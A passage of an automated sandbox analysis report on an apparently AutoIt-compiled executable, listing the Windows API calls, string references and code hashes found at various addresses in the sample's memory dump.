• GetPixel.GDI32(00000000,?,00000003), ref: 00535ACD
• ReleaseDC.USER32(00000000,00000003), ref: 00535B08
Similarity
• API ID: Window$ForegroundPixelRelease
• String ID:
• API String ID: 4156661090-0
APIs
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 004C134D
• SelectObject.GDI32(?,00000000), ref: 004C135C
• BeginPath.GDI32(?), ref: 004C1373
• SelectObject.GDI32(?,00000000), ref: 004C139C
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
APIs
Similarity
• API ID: _memcmp
• String ID:
• API String ID: 2931989736-0
APIs
• GetCurrentThreadId.KERNEL32 ref: 00524ABA
• __beginthreadex.LIBCMT ref: 00524AD8
• MessageBoxW.USER32(?,?,?,?), ref: 00524AED
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00524B03
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00524B0A
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
• String ID:
APIs
• GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0051821E
• GetLastError.KERNEL32(?,00517CE2,?,?,?), ref: 00518228
• GetProcessHeap.KERNEL32(00000008,?,?,00517CE2,?,?,?), ref: 00518237
• HeapAlloc.KERNEL32(00000000,?,00517CE2,?,?,?), ref: 0051823E
• GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00518255
Similarity
• API ID: HeapObjectSecurityUser$AllocErrorLastProcess
• String ID:
APIs
• CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00517044,80070057,?,?,?,00517455), ref: 00517127
• ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00517044,80070057,?,?), ref: 00517142
• lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00517044,80070057,?,?), ref: 00517150
• CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00517044,80070057,?), ref: 00517160
• CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00517044,80070057,?,?), ref: 0051716C
Similarity
• API ID: From$Prog$FreeStringTasklstrcmpi
• String ID:
APIs
• QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00525260
• QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0052526E
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00525276
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00525280
• Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005252BC
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00518121
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0051812B
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0051813A
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00518141
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00518157
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
APIs
• GetDlgItem.USER32(?,000003E9), ref: 0051C1F7
• GetWindowTextW.USER32(00000000,?,00000100), ref: 0051C20E
• MessageBeep.USER32(00000000), ref: 0051C226
• KillTimer.USER32(?,0000040A), ref: 0051C242
• EndDialog.USER32(?,00000001), ref: 0051C25C
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• String ID:
APIs
• EndPath.GDI32(?), ref: 004C13BF
• StrokeAndFillPath.GDI32(?,?,004FB888,00000000,?), ref: 004C13DB
• SelectObject.GDI32(?,00000000), ref: 004C13EE
• DeleteObject.GDI32 ref: 004C1401
• StrokePath.GDI32(?), ref: 004C141C
Similarity
• API ID: Path$ObjectStroke$DeleteFillSelect
• String ID:
APIs
  • Part of subcall function 004E0DB6: std::exception::exception.LIBCMT ref: 004E0DEC
  • Part of subcall function 004E0DB6: __CxxThrowException@8.LIBCMT ref: 004E0E01
  • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
  • Part of subcall function 004C7A51: _memmove.LIBCMT ref: 004C7AAB
• __swprintf.LIBCMT ref: 004D2ECD
Strings
• \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 004D2D66
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                      • API String ID: 1943609520-557222456
                                                                                                                      • Opcode ID: 313ef11cc64aabb391975d1aae461375acaab5f899d0ef86e64de6aae3159fd8
                                                                                                                      • Instruction ID: 3f1e1655d7394643d15860b4464b30152d8c0a2208147b1cc967dcc1a2f45fd5
                                                                                                                      • Opcode Fuzzy Hash: 313ef11cc64aabb391975d1aae461375acaab5f899d0ef86e64de6aae3159fd8
                                                                                                                      • Instruction Fuzzy Hash: DB91ABB5108201AFC714EF25C895D6FBBA4FF95314F00481FF4919B2A1EA78ED44CB5A
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004C4743,?,?,004C37AE,?), ref: 004C4770
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0052B9BB
                                                                                                                      • CoCreateInstance.OLE32(00552D6C,00000000,00000001,00552BDC,?), ref: 0052B9D4
                                                                                                                      • CoUninitialize.OLE32 ref: 0052B9F1
                                                                                                                        • Part of subcall function 004C9837: __itow.LIBCMT ref: 004C9862
                                                                                                                        • Part of subcall function 004C9837: __swprintf.LIBCMT ref: 004C98AC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                      • String ID: .lnk
                                                                                                                      • API String ID: 2126378814-24824748
                                                                                                                      • Opcode ID: ac055c4a8b2360782d09bd6ff54cf6961238c6e0f94371808505593f3d978a1e
                                                                                                                      • Instruction ID: 01311dc6ddc23876db00200adca4640bcb47e9f733a126cbe578ac7c06a26bf6
                                                                                                                      • Opcode Fuzzy Hash: ac055c4a8b2360782d09bd6ff54cf6961238c6e0f94371808505593f3d978a1e
                                                                                                                      • Instruction Fuzzy Hash: D7A14675604211AFDB00EF15C484E5ABBE5FF8A318F04899DF8999B3A1CB31ED45CB91
                                                                                                                      APIs
                                                                                                                      • OleSetContainedObject.OLE32(?,00000001), ref: 0051B4BE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ContainedObject
                                                                                                                      • String ID: AutoIt3GUI$Container$%U
                                                                                                                      • API String ID: 3565006973-3915410733
                                                                                                                      • Opcode ID: b713ad8a85caaf45318a28c33ba0430d761283736dff05d993e1ef5863bb8884
                                                                                                                      • Instruction ID: 3f7844a3396ac4c55213146c4c54d5caf759d002dee54308da2bf10a96467331
                                                                                                                      • Opcode Fuzzy Hash: b713ad8a85caaf45318a28c33ba0430d761283736dff05d993e1ef5863bb8884
                                                                                                                      • Instruction Fuzzy Hash: D8914D70600601AFEB54DF65C884BAABBF5FF49711F10856DF94ACB291EBB1E881CB50
                                                                                                                      APIs
                                                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 004E50AD
                                                                                                                        • Part of subcall function 004F00F0: __87except.LIBCMT ref: 004F012B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorHandling__87except__start
                                                                                                                      • String ID: pow
                                                                                                                      • API String ID: 2905807303-2276729525
                                                                                                                      • Opcode ID: 1f1bddbb157e9e011c6f834621ab4f831f65bb337208b57ca562c02083c35717
                                                                                                                      • Instruction ID: 7ca225c311b29d84cbae2fb5e59b3f5a6587e63cb094b574fa6c566a3d9380b0
                                                                                                                      • Opcode Fuzzy Hash: 1f1bddbb157e9e011c6f834621ab4f831f65bb337208b57ca562c02083c35717
                                                                                                                      • Instruction Fuzzy Hash: 04518C20D0864986DB117716CD1137F2B909B8070AF208D9BF5D5863ABDF3D8DC8A68F
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID: 3cM$_M
                                                                                                                      • API String ID: 4104443479-23921487
                                                                                                                      • Opcode ID: 9934898ff32755472e6ac2071c50b970f76ec7e7c2a2e4b6caecfb8c0fcfd26b
                                                                                                                      • Instruction ID: 7a538ec7b6742ecd807099caa527c2adabd60aaeb4b4c48459719a05a97f7d04
                                                                                                                      • Opcode Fuzzy Hash: 9934898ff32755472e6ac2071c50b970f76ec7e7c2a2e4b6caecfb8c0fcfd26b
                                                                                                                      • Instruction Fuzzy Hash: CE516070900609DFCF24CF68C894ABEBBB1FF45304F24856AE89AD7390EB35A955CB51
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 005214BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00519296,?,?,00000034,00000800,?,00000034), ref: 005214E6
                                                                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0051983F
                                                                                                                        • Part of subcall function 00521487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005192C5,?,?,00000800,?,00001073,00000000,?,?), ref: 005214B1
                                                                                                                        • Part of subcall function 005213DE: GetWindowThreadProcessId.USER32(?,?), ref: 00521409
                                                                                                                        • Part of subcall function 005213DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0051925A,00000034,?,?,00001004,00000000,00000000), ref: 00521419
                                                                                                                        • Part of subcall function 005213DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0051925A,00000034,?,?,00001004,00000000,00000000), ref: 0052142F
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005198AC
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005198F9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 4150878124-2766056989
                                                                                                                      • Opcode ID: 25718447d26778c2d568d312e87ba583941e9e91b46be5454710228ae8d547db
                                                                                                                      • Instruction ID: 1a33140ef61cc903d7c542f7a88204088007cf570334732ecf5c1469d73c4914
                                                                                                                      • Opcode Fuzzy Hash: 25718447d26778c2d568d312e87ba583941e9e91b46be5454710228ae8d547db
                                                                                                                      • Instruction Fuzzy Hash: DB415E76901119BEDB10DFA4CC55EDEBBB8FF56300F004099F949B7181DA716E85CBA0
                                                                                                                      APIs
                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0054F910,00000000,?,?,?,?), ref: 005479DF
                                                                                                                      • GetWindowLongW.USER32 ref: 005479FC
                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00547A0C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Long
                                                                                                                      • String ID: SysTreeView32
                                                                                                                      • API String ID: 847901565-1698111956
                                                                                                                      • Opcode ID: c6dac75b32d0d8a1a34c91befd4ab0a43ea160b4503370fee84339a95753ea69
                                                                                                                      • Instruction ID: dcaec98af88d8ef538ffee7ef61e9652d629dee5db02fcd3aac495fadb96db06
                                                                                                                      • Opcode Fuzzy Hash: c6dac75b32d0d8a1a34c91befd4ab0a43ea160b4503370fee84339a95753ea69
                                                                                                                      • Instruction Fuzzy Hash: 2431C13520420AAFDB118E38DC45BEA7BA9FB09328F244729F875E32E1D731ED519B50
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00547461
                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00547475
                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00547499
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window
                                                                                                                      • String ID: SysMonthCal32
                                                                                                                      • API String ID: 2326795674-1439706946
                                                                                                                      • Opcode ID: 9021685c172c11d88bbc95f94b3d6af300f047d38f10eb9bee40f3e9cc6578a1
                                                                                                                      • Instruction ID: 9bf0489afa010522a0d5383494910a69fd96dc897659e00d6d3e6531f56eb433
                                                                                                                      • Opcode Fuzzy Hash: 9021685c172c11d88bbc95f94b3d6af300f047d38f10eb9bee40f3e9cc6578a1
                                                                                                                      • Instruction Fuzzy Hash: E8218D32600219ABDF118E64DC46FEA3F69FB4D728F110214FE156B190DBB5A8559BA0
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00547C4A
                                                                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00547C58
                                                                                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00547C5F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$DestroyWindow
                                                                                                                      • String ID: msctls_updown32
                                                                                                                      • API String ID: 4014797782-2298589950
                                                                                                                      • Opcode ID: 86dfdb4bd724288ca8243410b8aeab0732cd5df315e8ed0a6f7b42395cdc35a6
                                                                                                                      • Instruction ID: 6d593894c72bb764de8c6655a06cd48d180cd3f2f9fe2e8ea8ab88db0cde2111
                                                                                                                      • Opcode Fuzzy Hash: 86dfdb4bd724288ca8243410b8aeab0732cd5df315e8ed0a6f7b42395cdc35a6
                                                                                                                      • Instruction Fuzzy Hash: 4B2181B5204108AFDB10DF28DCC5DA63BECFF5A358B140059F9059B3A1DB31EC119B60
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00546D3B
                                                                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00546D4B
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00546D70
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$MoveWindow
                                                                                                                      • String ID: Listbox
                                                                                                                      • API String ID: 3315199576-2633736733
                                                                                                                      • Opcode ID: 72ea031cc13b219860b7df9251a24cb5db24eb5cf2daed8cd3fbb1ab2f8aa58d
                                                                                                                      • Instruction ID: d063928c99b5e339967dd805b8caca7e0878d430441219aaff95a85db10e3bf4
                                                                                                                      • Opcode Fuzzy Hash: 72ea031cc13b219860b7df9251a24cb5db24eb5cf2daed8cd3fbb1ab2f8aa58d
                                                                                                                      • Instruction Fuzzy Hash: 2C21B032600118BFEF118F54DC85FEB3BBAFB8A758F018128F9459B1A0C6719C5197A1
                                                                                                                      APIs
                                                                                                                      • __snwprintf.LIBCMT ref: 00533A66
                                                                                                                        • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __snwprintf_memmove
                                                                                                                      • String ID: , $$AUTOITCALLVARIABLE%d$%U
                                                                                                                      • API String ID: 3506404897-3415628243
                                                                                                                      • Opcode ID: 41833e337e82969657b4a68bdf64b2a5c9f5768688c8ad9973dbf1b66ebdc3e2
                                                                                                                      • Instruction ID: 357b1a944046ce462155c21f66220d7c4df35013da472eb5f89f079046904058
                                                                                                                      • Opcode Fuzzy Hash: 41833e337e82969657b4a68bdf64b2a5c9f5768688c8ad9973dbf1b66ebdc3e2
                                                                                                                      • Instruction Fuzzy Hash: 7521A034600219AFCF10EF65DC86EAE7BB9BF44314F40446DF449AB182DB34EA45CB65
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00547772
                                                                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00547787
                                                                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00547794
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: msctls_trackbar32
                                                                                                                      • API String ID: 3850602802-1010561917
                                                                                                                      • Opcode ID: ee3f02713d9be5a87b262b649cc3855c5cc364fae20b0d8347beefb3db457a8d
                                                                                                                      • Instruction ID: 282f07e350a780c7d2100a2ff2d6f4997c9ef6b698793423b0dc9855ce72ea61
                                                                                                                      • Opcode Fuzzy Hash: ee3f02713d9be5a87b262b649cc3855c5cc364fae20b0d8347beefb3db457a8d
                                                                                                                      • Instruction Fuzzy Hash: 16112772244208BAEF105F65CC05FE77B68FF89B58F014118FA45A2091D771E811DB20
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __calloc_crt
                                                                                                                      • String ID: W$@BX
                                                                                                                      • API String ID: 3494438863-1013435409
                                                                                                                      • Opcode ID: 4cb51a435faf33ea61271a740555d8030a1d5dfef60df802a5ae996f4f943a89
                                                                                                                      • Instruction ID: 77f10357b4a3632c8c503d3076b42e55c74a5ae09b0aa32be79aef41884ec355
                                                                                                                      • Opcode Fuzzy Hash: 4cb51a435faf33ea61271a740555d8030a1d5dfef60df802a5ae996f4f943a89
                                                                                                                      • Instruction Fuzzy Hash: 47F0A4792046618FE7258F67BC52A522794E724375F11045BE505DE280FF38A8455788
                                                                                                                      APIs
                                                                                                                      • __lock.LIBCMT ref: 004E9B94
                                                                                                                        • Part of subcall function 004E9C0B: __mtinitlocknum.LIBCMT ref: 004E9C1D
                                                                                                                        • Part of subcall function 004E9C0B: EnterCriticalSection.KERNEL32(00000000,?,004E9A7C,0000000D), ref: 004E9C36
                                                                                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 004E9BA4
                                                                                                                        • Part of subcall function 004E9100: ___addlocaleref.LIBCMT ref: 004E911C
                                                                                                                        • Part of subcall function 004E9100: ___removelocaleref.LIBCMT ref: 004E9127
                                                                                                                        • Part of subcall function 004E9100: ___freetlocinfo.LIBCMT ref: 004E913B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
